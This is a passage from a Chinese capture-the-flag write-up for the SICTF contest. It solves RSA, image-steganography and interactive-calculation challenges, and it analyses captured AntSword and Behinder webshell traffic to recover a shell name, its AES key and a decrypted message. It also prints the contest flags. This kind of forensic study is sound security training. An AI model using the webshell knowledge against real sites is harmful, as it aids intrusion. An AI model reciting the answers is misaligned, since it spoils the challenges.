phi_n = (p**alpha - p**(alpha-1)) * (q**(alpha*2) - q**(alpha*2-1)) * (r**(alpha*4) - r**(alpha*4-1)) * (s**2 - s)
d = gmpy2.invert(e,phi_n)
m = pow(c,d,n)
print(libnum.n2s(int(m)))
后经提醒因为p>m也可以直接mod p
MISC
签到打卡完成
颜色有点淡可以用ps拉对比度
也可以提取(239,239,239)的颜色
不好扫可以用CQR扫完再生成一个
发送SICTF获得flag
color
在这里插入图片描述
一张混淆的图片能看出二维码的痕迹
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mwnoiTLa-1674185779732)(null)](https://img-blog.csdnimg.cn/b4f227e5d22440f8b26db518471f8289.png)
文件尾有额外数据是压缩包 补上PK头解压得到加密脚本
from PIL import Image
import random
flag = Image.open("flag.png")
flag = flag.convert("RGB")
new = Image.new("RGB",flag.size)
h=flag.height
w=flag.width
num=[0,128,255]
for i in range(h):
for k in range(w):
r,g,b = flag.getpixel((i,k))
if r == 0 and g == 0 and b ==0:
new.putpixel((i,k),((random.choice(num),random.choice(num),random.choice(num))))
else:
new.putpixel((i,k),(random.randint(0,255),random.randint(0,255),random.randint(0,255)))
new.save('save.png')
这个脚本把黑色像素替换的rgb替换为0 128 255中的随机值
白色的rgb替换为0-255中的随机值
反向写一个脚本
from PIL import Image
load = Image.open('save.png')
flag = Image.new('RGB',load.size)
h=flag.height
w=flag.width
for i in range(h):
for k in range(w):
r,g,b = load.getpixel((i,k))
if (r == 0 or r==128 or r == 255) and (g == 0 or g==128 or g == 255) and (b == 0 or b==128 or b == 255):
flag.putpixel((i,k),(0,0,0))
else:
flag.putpixel((i,k),(255,255,255))
#flag.show()
flag.save('flag.png')
扫码得到flag
geek_challenge
交互计算题
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xbfZNReO-1674185779316)(null)](https://img-blog.csdnimg.cn/a3c200a9fbd34bb886a0af7da39acfa3.png)
写pwntools交互脚本解5000次就很不理解对服务器不友好
from pwn import *
context.log_level = ('debug')
r = remote('ctf.qsnctf.com',10840)
r.recvuntil(b'\n\n')
i = 0
while True:
calc = r.recvline(b'= ?')[:-4]
r.sendlineafter('answer:',str(eval(calc)))
if r.recvline()==b'Good job!\n':
continue
print(i)
r.interactive()
hacker
蚁剑流量
tcp20流 追踪HTTP
去掉前九位解base64 可以得到
U2FsdGVkX19bEN3D8vFeG39VyYXPwle2mMQLh5T1HYiSI1XCx7rJhsDnp9qLpUQB
yITd05Uu05ZAv0o=e264c55be
/tmp
a7eb3df874e
U2FsdGVkX19是Salted__ 一般是网站加盐的AES DES TriDES RABBIT RC4
需要key前面流可以经常见到一个文件夹
`cd /var/tmp/password1sGui_1s_shumu
解rabbit得到flag
hacker2
大黑客树木再次上传了shell并用工具进行连接他在上传目录的一堆测试txt中找到了重要的字符串我们观察并截取了流量
你能告诉我们他上传的shell的名称和key值以及最终找到的重要字符串吗
flag格式SICTF{shell名称_密钥_文本文件中存储的字符串}
TCP第0流就可以看到 冰蝎马的特征
key是7d7c23e87b47368b
TCP第13流可以看到she1l.php
顺便讲一下这一流中写的是冰蝎控制端与被控端进行认证的流量
如何就是慢慢看流量
TCP46流追踪HTTP可以找到
uU7xO0V/KGySO6rdSlEw/dQXFklZWZn1EMhiAAoH7WNpJcvkV3JcvqHelZOOHVA0YKUdylNKNgf4+x+WrC/GkA==
冰蝎AES的方式是CBCmode IV为16个\x00
用脚本解密
from base64 import b64decode
from Crypto.Cipher import AES
def aes_def(key,input_text):
# 非保留模式
if b"==" not in input_text:
input_text = input_text + b"=="
input_text = b64decode(input_text)
mode = AES.MODE_CBC
iv = b'\0' * 16
cryptos = AES.new(key, mode, iv)
plain_text = cryptos.decrypt(input_text).decode('utf-8', 'ignore')
return plain_text
key=b"7d7c23e87b47368b"
message = b'uU7xO0V/KGySO6rdSlEw/dQXFklZWZn1EMhiAAoH7WNpJcvkV3JcvqHelZOOHVA0YKUdylNKNgf4+x+WrC/GkA=='
decode_message = aes_def(key,message)
print(decode_message)
得到
{"status":"c3VjY2Vzcw==","msg":"YzByUmVjdCEhIQ=="}
msg解码得到 c0rRect!!!
拼起来得到flag
SICTF{she1l_7d7c23e87b47368b_c0rRect!!!}
ezmisc
二血 这题难度还行最少解的题我和一血都是非预期
解压的时候flag.zip是伪加密修改两个09为00后可以解压
f1ag.png
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LevhOFJf-1674185779663)(null)\
这是一只流浪的flag留给我们的秘密我需要一个中文拼音全拼。
肯定不是泷奈
看看secret.txt里面
尝试倒序解base64
发现是三个数字联想为rgb一共有268780行刚好和f1ag的分辨率对应
写脚本转为图片颜色是rgb还是bgr不影响解题非预期
from PIL import Image
import base64
secret = open('secret~.txt','r').readlines()[:-2:]
f1ag = Image.open('f1ag.png')
print(f1ag.size)
secret_img = Image.new('RGB',f1ag.size)
h=f1ag.height
w=f1ag.width
for i in range(w):
for k in range(h):
now_index = (i*h)+k
decode_base = [int(base64.b64decode(x).decode()) for x in (secret[now_index][::-1].split()[::-1])]
# rgb还是bgr不影响解题
r,g,b = r,g,b = decode_base[0],decode_base[1],decode_base[2]
secret_img.putpixel((i,k),(r,g,b))
# secret_img.show()
secret_img.save('wtf2.png')
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qphrfw1y-1674185779486)(null)]
其实已经可以看出来六花了
拿这个图和f1ag异或
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-D23bKhjp-1674185779768)(null)\
小鸟游六花我甚至把原图都找出来了 pid 93430703
f1agpng文件尾有oursecret的隐写特征
oursecret解f1ag.png 密码xiaoniaoyouliuhua
得到flag.txt
没用到Xkey和attachment.7z非预期了
在这里插入图片描述
其实xkey解XXencode是7z的密码里面是个混淆的加密脚本
王八树木
打开树木
一眼jpg倒序反过来文件尾有个加密zip
爆破得到密码123456
得到密码SI!!!!!!
jpg解silentEye
得到猫脸变换的参数
脚本还原
import cv2
import numpy as np
import matplotlib.image as mpimg
def de_arnold(img,shuffle_time,a,b):
r, c, d = img.shape
dp = np.zeros(img.shape, np.uint8)
for s in range(shuffle_time):
for i in range(r):
for j in range(c):
x = ((a * b + 1) * i - b * j) % r
y = (-a * i + j) % c
dp[x, y, :] = img[i, j, :]
img = np.copy(dp)
return img
img = mpimg.imread('flag.bmp')
img = img[:, :, ::-1]
new = de_arnold(img, 2, 1, 2)
cv2.imshow('picture', new)
cv2.waitKey(0)
Revenge
zip是伪加密
uncompyle6反编译pyc得到加密脚本
# uncompyle6 version 3.8.0
# Python bytecode 3.7.0 (3394)
# Decompiled from: Python 3.8.10 (default, Nov 14 2022, 12:59:47)
# [GCC 9.4.0]
# Embedded file name: encode.py
# Compiled at: 2023-01-17 14:47:26
# Size of source mod 2**32: 439 bytes
import secret
import cv2
import numpy as np
from random import randint
Hg = np.float32(cv2.imread('flag.png', 1))
for i in range(64):
for j in range(64):
Si = randint(0, 2)
Fe = Hg[:, :, Si]
Mg = cv2.dct(Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8])
if secret[(i * 64 + j)] == '1':
Mg[(7, 7)] = 20
else:
if secret[(i * 64 + j)] == '0':
Mg[(7, 7)] = -20
Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8] = cv2.idct(Mg)
Hg[:, :, Si] = Fe
cv2.imwrite('flag.png', Hg)
# okay decompiling key.pyc
8x8 dct 分块变换
secret是0和1组成的
Si是0-2的随机数爆破一下
import cv2
import numpy as np
from random import randint
# read the original image
Hg = np.float32(cv2.imread('../flag.png', 1))
# create an empty list to store the hidden information
secret = []
# iterate through each 8x8 block
for i in range(64):
for j in range(64):
for Si in range(3):
Fe = Hg[:, :, Si]
Mg = cv2.dct(Fe[8 * i:8 * i + 8, 8 * j:8 * j + 8])
if Mg[(7, 7)] > 10:
secret.append('1')
elif Mg[(7, 7)] < -10 :
secret.append('0')
# print the recovered secret message
print(''.join(secret))
得到
0100101001110000001100100100101001000100010001000110101101101101010100010011000101010010011100110101000100111001011001100110101000110110001100110111000001110100011000010101100001000001010100110110001001000111011001010100101000110101011101010111000100110010010101010110001101100101010101110100110001100101010100110100001001111000010001100101011101000110010101010101100000110111011010000110001101010111001100100110001001101010010100100110110101000111010100100110111001001011010101000011100101110001010011100110011001100100010001110100110000110010011100100011100001110011001110000110110101101011010100010110111101000110010001100110010101010110001101000101101001111000001100100100011101000010010100100101010101010101011000110101011001101001011010110101001001100101010101100111010101011010011011110011100100110111010101010100011001011001011001110101001100110001010100100011010101000110010000110101001101100010011001010110101001000101011011110100001101110111010100010111011101000110010000110101100101110111010101000100101101101011001101110101001100110110011101010101101001101001010110100110100101100110010000100011001001000001011000100100100001110000011001010101101001110110010000010111100101000010010011010100101001100111010101000110101001001011010100110111011101110010011110100101001001110010011100100011001100110011001100100111010001100001001110000110010101100100001101010111100001000111010000100110100000110101010011100110001001110010010101010111100001100011011101110100001001001011010110000101011101100010011010000100110101000011011110100101101000110010010001000111000101110100010000010011000101110100011000110111100101001010011011100011011101000001011101010111101001000110010010110100100000111001011001110110110101101111010011100100001001101010010010100111001101111001011000100100010100110100011010100100101000110101011100100111010101001100010000010100001001000010001100100100110001101111010010100111011100110110011101110110010100110001010010000110000101010101011010000110101101010010010011010110101100110010001101000110001001000101011101000011001001110011011011110101010101110011011010000101010101100111010101000101010101010100010001010100110101010100011010010100110100111001001100100011001101101001011100110101010101110101011011100100101000110011010100010110100001100100010011100011100101001100011000110100111000110100001101110011011001101011010000110110010001110011010001110011001001000001011100010110010101110111011110000111100001011010010001000110000101010101010001010111001101010011011000100011011100110100011001110101100101010000001100110111000000111001001101000011010001110000010100000110100001110110010011000111001001101111010011000011100001101000011010100101011001101111010010000111011101000100011110100110001001000011011000110101010101011001010000110011001001101000010110100011001101110000001100100111011101101110010110100101001101100011011011100101101001100100011110000011001100110001011010100101000101000101011100100011011001001011011110000110111101100101001100100110001001101010011000010111001001110011001101110111000001000001011100110100100001101001011100000100110101000010001101010110000101100010001100010100000101110100011100010110100101100110001100100111100001001100010001000100101100110011010001000101001100110101011100010110100001000100010000010101000001001010010011000100101001101111011110100100110001101011011110010100010101011000011101110110111001010011001100110110010101110011010100010110010101001100011000010100001001001010010101010100011001101101011100100100011101011001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
去掉最后补全用的0